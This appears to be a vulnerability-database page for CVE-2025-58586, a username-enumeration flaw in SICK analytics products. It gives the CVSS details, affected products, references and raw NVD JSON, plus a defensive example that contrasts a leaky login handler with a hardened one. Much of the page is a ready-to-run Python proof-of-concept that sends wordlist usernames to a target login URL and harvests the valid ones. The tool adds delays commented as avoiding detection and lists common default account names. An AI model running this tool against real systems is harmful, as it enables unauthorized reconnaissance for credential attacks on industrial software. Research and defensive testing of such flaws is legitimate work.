Security Vulnerability Report
CVE-2025-58586 CVSS 5.3 MEDIUM

CVE-2025-58586

Published: 2025-10-06 07:15:35
Last Modified: 2026-01-27 19:46:54

Description

For failed login attempts, the application returns different error messages depending on whether the login failed due to an incorrect password or a non-existing username. This allows an attacker to guess usernames until they find an existing one.
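The defect described above is a CWE-204 response discrepancy. The following is an added illustration (not code from SICK's products or from the advisory) showing a login handler with that defect next to a hardened one that returns a single generic failure message and always performs the password-hash comparison, so neither the message nor its timing reveals whether the account exists. The user store, salt and message strings are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed sample credential store (not real product data): username -> (salt, pbkdf2 hash)
_SALT = b"constructed-salt"


def _hash_pw(password: str, salt: bytes = _SALT) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


USERS = {"operator": (_SALT, _hash_pw("correct horse battery staple"))}

# Dummy credential used when the username is unknown, so the hash check still runs
# and the failure path costs the same whether or not the account exists.
_DUMMY = (_SALT, _hash_pw(os.urandom(16).hex()))


def login_vulnerable(username: str, password: str) -> str:
    """The CWE-204 pattern: the error text differs by failure cause."""
    entry = USERS.get(username)
    if entry is None:
        return "Error: user not found"
    salt, stored = entry
    if not hmac.compare_digest(_hash_pw(password, salt), stored):
        return "Error: incorrect password"
    return "OK"


def login_hardened(username: str, password: str) -> str:
    """One generic failure message; the hash is computed and compared on every path."""
    salt, stored = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(_hash_pw(password, salt), stored)
    if ok and username in USERS:
        return "OK"
    return "Error: invalid username or password"


def leaks_username_existence(login) -> bool:
    """Regression check: failed logins for a known and an unknown account must be indistinguishable."""
    known = login("operator", "wrong-password")
    unknown = login("nobody", "wrong-password")
    return known != unknown
```

The `leaks_username_existence` check is the kind of assertion a test suite can keep around to catch a reintroduced discrepancy in the response body.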

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK industrial automation products (for the specific affected versions, refer to the official security advisory sca-2025-0010)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-58586 - SICK Product Username Enumeration PoC

This PoC demonstrates how to enumerate valid usernames by analyzing
differential error messages in the login response.
"""

import requests
import argparse
import sys
import time


class UsernameEnumerator:
    """
    Username enumeration tool that exploits differential error messages
    in the login functionality of SICK products.
    """

    def __init__(self, target_url, username_field="username", password_field="password"):
        self.target_url = target_url
        self.username_field = username_field
        self.password_field = password_field
        self.session = requests.Session()

        # Known different response indicators based on vulnerability analysis
        self.user_not_found_indicators = [
            "user not found",
            "username does not exist",
            "invalid username",
            "user does not exist",
            "no such user",
            "account not found",
            "unknown user",
        ]

        self.wrong_password_indicators = [
            "incorrect password",
            "wrong password",
            "invalid password",
            "invalid credentials",
            "authentication failed",
            "login failed",
            "password mismatch",
        ]

    def check_response(self, response_text):
        """
        Analyze the response to determine if the username exists.
        Returns True if username likely exists, False otherwise.
        """
        response_lower = response_text.lower()

        # Check for user-not-found indicators
        for indicator in self.user_not_found_indicators:
            if indicator in response_lower:
                return False

        # Check for wrong-password indicators
        for indicator in self.wrong_password_indicators:
            if indicator in response_lower:
                return True

        # If no clear indicator, return None (undetermined)
        return None

    def enumerate_usernames(self, username_list, delay=0.5):
        """
        Enumerate valid usernames from a wordlist.
        """
        valid_usernames = []

        for username in username_list:
            try:
                # Send login request with a dummy password
                payload = {
                    self.username_field: username,
                    self.password_field: "InvalidPassword123!@#",
                }

                response = self.session.post(
                    self.target_url,
                    data=payload,
                    timeout=10,
                    allow_redirects=False,
                )

                result = self.check_response(response.text)

                if result is True:
                    print(f"[+] VALID USER FOUND: {username}")
                    valid_usernames.append(username)
                elif result is False:
                    print(f"[-] Invalid user: {username}")
                else:
                    print(f"[?] Undetermined: {username} - Response: {response.text[:100]}")

                time.sleep(delay)  # Rate limiting to avoid detection

            except requests.exceptions.RequestException as e:
                print(f"[!] Error testing {username}: {e}")
                continue

        return valid_usernames


def load_wordlist(filepath):
    """Load username wordlist from file."""
    try:
        with open(filepath, "r", encoding="utf-8") as f:
            return [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[!] Wordlist file not found: {filepath}")
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-58586 - SICK Product Username Enumeration Tool"
    )
    parser.add_argument(
        "-u", "--url", required=True,
        help="Target login URL (e.g., https://target.com/login)",
    )
    parser.add_argument(
        "-w", "--wordlist", required=True,
        help="Path to username wordlist file",
    )
    parser.add_argument(
        "-d", "--delay", type=float, default=0.5,
        help="Delay between requests in seconds (default: 0.5)",
    )
    parser.add_argument(
        "--user-field", default="username",
        help="Username field name (default: username)",
    )
    parser.add_argument(
        "--pass-field", default="password",
        help="Password field name (default: password)",
    )
    parser.add_argument(
        "-o", "--output", default="valid_users.txt",
        help="Output file for valid usernames (default: valid_users.txt)",
    )

    args = parser.parse_args()

    print("[*] CVE-2025-58586 Username Enumeration Tool")
    print(f"[*] Target: {args.url}")
    print(f"[*] Wordlist: {args.wordlist}")
    print(f"[*] Delay: {args.delay}s")
    print("-" * 50)

    username_list = load_wordlist(args.wordlist)
    print(f"[*] Loaded {len(username_list)} usernames to test")
    print("-" * 50)

    enumerator = UsernameEnumerator(args.url, args.user_field, args.pass_field)
    valid_users = enumerator.enumerate_usernames(username_list, args.delay)

    print("-" * 50)
    print(f"[*] Enumeration complete. Found {len(valid_users)} valid usernames.")

    if valid_users:
        with open(args.output, "w", encoding="utf-8") as f:
            for user in valid_users:
                f.write(user + "\n")
        print(f"[*] Results saved to: {args.output}")


if __name__ == "__main__":
    main()

# Usage example:
# python cve-2025-58586.py -u https://target-sick-product.com/login -w usernames.txt -d 1.0
#
# Sample usernames.txt:
# admin
# root
# user
# operator
# service
# guest
# maintenance
# supervisor
# engineer
# technician
```

References

- https://sick.com/psirt (Vendor Advisory)
- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
- https://www.first.org/cvss/calculator/3.1 (Not Applicable)
- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json (Vendor Advisory)
- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf (Vendor Advisory)
- https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product)

Weakness: CWE-204 (Observable Response Discrepancy)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-58586", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:35.390", "lastModified": "2026-01-27T19:46:54.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "For failed login attempts, the application returns different error messages depending on whether the login failed due to an incorrect password or a non-existing username. This allows an attacker to guess usernames until they find an existing one."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
```